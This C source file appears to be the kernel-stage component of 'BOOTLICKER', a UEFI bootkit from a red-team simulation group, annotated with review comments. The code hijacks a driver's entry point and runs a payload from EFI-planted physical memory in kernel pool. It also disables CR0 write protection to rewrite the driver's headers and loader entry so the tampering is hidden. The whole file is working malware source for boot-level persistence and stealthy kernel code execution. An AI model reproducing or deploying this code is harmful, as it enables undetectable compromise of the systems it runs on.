/*!
*
* BOOTLICKER
*
* GuidePoint Security LLC
*
* Threat and Attack Simulation Team
*
!*/
#include "Common.h"
/*
 * Local prototypes for the ntoskrnl exports DrvMain resolves by hash at
 * run time (see the H_API_* values and the PeGetFuncEat() calls below).
 * They are declared here instead of pulling in WDK headers, so the
 * parameter types are plain integer/pointer widths rather than the WDK
 * ones (POOL_TYPE, PHYSICAL_ADDRESS, MEMORY_CACHING_TYPE, KAFFINITY).
 * NOTE(review): this is only ABI-safe where each WDK type is passed the
 * same way as a SIZE_T/LPVOID (e.g. x64, where PHYSICAL_ADDRESS is a
 * 64-bit value passed in a register) — confirm for every target arch.
 */
VOID
NTAPI
KeSetSystemAffinityThread(
_In_ SIZE_T Affinity
);
/* PoolType is passed as a raw integer; DrvMain passes 0 for it. */
PVOID
NTAPI
ExAllocatePool(
_In_ SIZE_T PoolType,
_In_ SIZE_T NumberOfBytes
);
VOID
NTAPI
MmUnmapIoSpace(
_In_ LPVOID BaseAddress,
_In_ SIZE_T NumberOfBytes
);
/* PhysicalAddress is the physical address as a pointer-sized integer. */
PVOID
NTAPI
MmMapIoSpace(
_In_ LPVOID PhysicalAddress,
_In_ SIZE_T NumberOfBytes,
_In_ SIZE_T CacheType
);
/*
 * Table of resolved kernel exports used by DrvMain. D_API() comes from
 * Common.h; it is taken to declare a function-pointer member carrying the
 * named function's prototype — confirm in Common.h. The table lives on
 * DrvMain's stack and is wiped with RtlSecureZeroMemory before it is
 * filled and again before control leaves DrvMain.
 */
typedef struct
{
D_API( KeSetSystemAffinityThread );
D_API( ExAllocatePool );
D_API( MmUnmapIoSpace );
D_API( MmMapIoSpace );
} API ;
/*
 * API Hashes
 *
 * Each value is the hash of the export name in its trailing comment, in
 * whatever scheme PeGetFuncEat() uses to walk the kernel's export table;
 * the scheme itself is not visible in this file. The hashes must be
 * regenerated with the same routine if any name changes.
 * NOTE(review): what PeGetFuncEat() returns on a miss (presumably NULL)
 * is not visible here — confirm, since DrvMain calls through the result.
 */
#define H_API_KESETSYSTEMAFFINITYTHREAD 0x80679c78 /* KeSetSystemAffinityThread */
#define H_API_EXALLOCATEPOOL 0xa1fe8ce1 /* ExAllocatePool */
#define H_API_MMUNMAPIOSPACE 0xf2610ec4 /* MmUnmapIoSpace */
#define H_API_MMMAPIOSPACE 0x7fbf0801 /* MmMapIoSpace */
/*!
*
* Purpose:
*
* Copies the kernel-mode payload out of the physical buffer the EFI
* stage left behind into non-paged pool and runs it, then restores
* the hijacked driver's entrypoint and headers and chains to the
* driver's original DriverEntry.
*
!*/
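/*
 * DrvMain - entrypoint stub the EFI stage patched into the hijacked driver.
 *
 * Runs in place of the target driver's DriverEntry. It (1) copies the
 * kernel payload out of Eft->KernelBuf into non-paged pool and calls its
 * KmEnt, (2) restores the target driver's section flags, loader entry and
 * PE entrypoint, and (3) tail-calls the driver's original DriverEntry.
 *
 * Parameters:
 *   DriverObject, RegistryPath - passed through untouched to the original
 *   DriverEntry.
 *
 * Returns: whatever the original DriverEntry returns.
 *
 * Every export is resolved by hash from Eft->KernelBase. A hash that does
 * not resolve on the running kernel build (PeGetFuncEat is assumed to
 * return NULL on a miss — confirm) must not be called through: a NULL
 * call from DriverEntry bugchecks the host on every boot. Each stage is
 * therefore skipped when its exports are missing; the chain to the
 * original DriverEntry always happens.
 */
D_SEC( G ) NTSTATUS NTAPI DrvMain( _In_ PVOID DriverObject, _In_ PVOID RegistryPath )
{
	API Api;
	ULONG Ofs = 0;
	PVOID Fcn = NULL;
	PVOID Phy = NULL;
	PEFTBL Eft = NULL;
	PIMAGE_DOS_HEADER Dos = NULL;
	PIMAGE_NT_HEADERS Nth = NULL;
	PIMAGE_SECTION_HEADER Sec = NULL;
	PLDR_DATA_TABLE_ENTRY Ldr = NULL;

	/* Zero out stack structures */
	RtlSecureZeroMemory( &Api, sizeof( Api ) );

	/*
	 * Locate the table the EFI stage left behind and, from it, the target
	 * driver's DOS/NT headers, its loader entry and the section header the
	 * EFI stage modified.
	 */
	Eft = C_PTR( G_PTR( EfTbl ) );
	Dos = C_PTR( U_PTR( Eft->TgtDrvImgBase ) );
	Nth = C_PTR( U_PTR( Dos ) + Dos->e_lfanew );
	Ldr = C_PTR( U_PTR( Eft->TgtDrvLdrEntry ) );
	Sec = C_PTR( U_PTR( Eft->TgtDrvImgSect ) );

	/* Resolve the kernel exports by hash from ntoskrnl's export table */
	Api.KeSetSystemAffinityThread = PeGetFuncEat( Eft->KernelBase, H_API_KESETSYSTEMAFFINITYTHREAD );
	Api.ExAllocatePool = PeGetFuncEat( Eft->KernelBase, H_API_EXALLOCATEPOOL );
	Api.MmUnmapIoSpace = PeGetFuncEat( Eft->KernelBase, H_API_MMUNMAPIOSPACE );
	Api.MmMapIoSpace = PeGetFuncEat( Eft->KernelBase, H_API_MMMAPIOSPACE );

	/*
	 * Stage 1: run the kernel payload. Only attempted when all three
	 * exports it needs resolved; otherwise fall through to the restore.
	 */
	if ( Api.MmMapIoSpace != NULL && Api.ExAllocatePool != NULL && Api.MmUnmapIoSpace != NULL ) {
		/*
		 * Map the physical buffer the EFI stage filled. Cache type 0 is
		 * taken to be MmNonCached — confirm against the WDK enum.
		 */
		if ( ( Phy = Api.MmMapIoSpace( Eft->KernelBuf, Eft->KernelLen, 0 ) ) != NULL ) {
			/*
			 * Allocate pool to execute from. 0 is passed as NonPagedPool;
			 * whether that comes back executable depends on the kernel
			 * build and on HVCI/VBS, which is not checked here.
			 */
			if ( ( Fcn = Api.ExAllocatePool( 0 /* NonPaged */, Eft->KernelLen ) ) != NULL ) {
				/* Copy the payload blob over */
				__builtin_memcpy( Fcn, Phy, Eft->KernelLen );

				/*
				 * KmEnt sits at a fixed distance from EfiMain inside the
				 * position-independent blob; apply that offset to the copy.
				 */
				Ofs = U_PTR( G_PTR( KmEnt ) ) - U_PTR( G_PTR( EfiMain ) );

				/*
				 * Execute KernelMain( KernelBase, TgtDrvImgBase ). Fcn is
				 * intentionally never freed: no ExFreePool is resolved and
				 * the payload presumably keeps running from it — confirm
				 * against KmEnt before ever adding a free here.
				 */
				( ( VOID NTAPI ( * )( PVOID, PVOID ) ) C_PTR( U_PTR( Fcn ) + Ofs ) )( Eft->KernelBase, Eft->TgtDrvImgBase );
			};
			/* Unmap the physical view; the pool copy is what keeps running */
			Api.MmUnmapIoSpace( Phy, Eft->KernelLen );
		};
	};

	/*
	 * Stage 2: undo the EFI stage's edits to the target driver so the
	 * image looks unmodified. The PE header page is read-only, so CR0.WP
	 * (bit 16) is dropped around the writes. WP is per-core, hence the
	 * thread is pinned to one CPU first so it cannot migrate mid-window.
	 * Interrupts are not masked during the window, and the affinity is
	 * never reverted (KeRevertToUserAffinityThread is not resolved), so
	 * the original DriverEntry below runs still pinned to CPU 0.
	 */
	if ( Api.KeSetSystemAffinityThread != NULL ) {
		/* Force to 1 CPU */
		Api.KeSetSystemAffinityThread( 1 );

		/* Remove write protection */
		__writecr0( __readcr0() &~ 0x000010000 );

		/*
		 * Fix the section permissions.
		 * NOTE(review): this masks Characteristics down to the EXECUTE bit
		 * alone, dropping READ/CODE and every other flag too. If the
		 * intent was only to clear the WRITE bit the EFI stage added,
		 * that would be `&= ~IMAGE_SCN_MEM_WRITE` — confirm against the
		 * EFI stage that set it before changing it.
		 */
		Sec->Characteristics &= IMAGE_SCN_MEM_EXECUTE;

		/* Fix the loader entry's entrypoint back to the original DriverEntry */
		Ldr->EntryPoint = C_PTR( U_PTR( Dos ) + U_PTR( Eft->TgtDrvAddressOfEntrypoint ) );

		/* Fix the image header's entrypoint RVA */
		Nth->OptionalHeader.AddressOfEntryPoint = Eft->TgtDrvAddressOfEntrypoint;

		/* Insert write protection */
		__writecr0( __readcr0() | 0x000010000 );
	};

	/* Zero out stack structures so no resolved pointers are left behind */
	RtlSecureZeroMemory( &Api, sizeof( Api ) );

	/*
	 * Execute the original driver entrypoint. The address is computed
	 * from Eft rather than from the header, so this works whether or not
	 * the restore above ran.
	 */
	return ( ( __typeof__( DrvMain ) * ) C_PTR( U_PTR( Eft->TgtDrvImgBase ) + Eft->TgtDrvAddressOfEntrypoint ) )(
		DriverObject, RegistryPath
	);
};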